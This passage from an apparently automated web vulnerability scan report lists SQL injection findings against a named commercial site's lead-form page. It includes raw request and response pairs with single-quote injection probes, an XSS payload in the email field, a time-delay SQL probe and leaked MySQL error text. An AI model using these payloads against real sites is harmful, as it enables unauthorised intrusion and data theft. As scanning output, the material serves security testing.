HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6odp9dajlk2hn3hcgmggfn31a6; path=/ Content-Length: 6702 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... <iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=o85bro90n4an481g7ub1l91cl7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 17692
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
1.141. http://www.insideup.com/ppc/leadflow/caad00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/caad00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code&1'=1 HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:06:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=90jnq0fvms20ufqsvhciko13r0; path=/ Content-Length: 6734 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... <iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=iupsc' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code&1''=1 HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:06:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=5dde61p9mjd4kuvuij344s7ba6; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
1.142. http://www.insideup.com/ppc/leadflow/caad00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.insideup.com
Path:
/ppc/leadflow/caad00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=dgbnpgknbsevanovfsnhkhl1d5; path=/ Content-Length: 6670 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The phone parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the phone parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:54:32 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=b24qe18qtfo91roi7k7321gdf4; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:03:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=lh6f0ggenrs8p2k245i4g8c2m5; path=/ Content-Length: 6702 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... <iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:03:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1qhilpa33muupcjda2cbv3l716; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The sessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the sessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=dob3g5mv8tmiqdq0c1cd776h02; path=/ Content-Length: 6630 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the subcategoryId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:54:39 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=bhumlini8tnt2aciiuedu73286; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011'&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:04:10 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=57kk09kp2k0kq7to5dp832kfn1; path=/ Content-Length: 6702 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... <iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011''&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:04:10 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=mqbjojaavpf5dvv6b485mmv924; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The website parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the website parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:54:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=isn2s5qudibti0n70qsqanmln5; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa'&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:05:32 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=65mo8gsv7hhe0a5bkfng2rok72; path=/ Content-Length: 6702 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... <iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa''&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:05:32 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=0msssctvgaogpt5hue495kta31; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:05:44 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=sap4hj2o0d7vd5g6vviihlg710; path=/ Content-Length: 6702 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... <iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code'' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:05:45 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=n69mkanvhm0e8kjl78uigqc2e4; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The zip parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the zip parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:55:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1h2qbq16c5qvaamd6nrgkno2s7; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
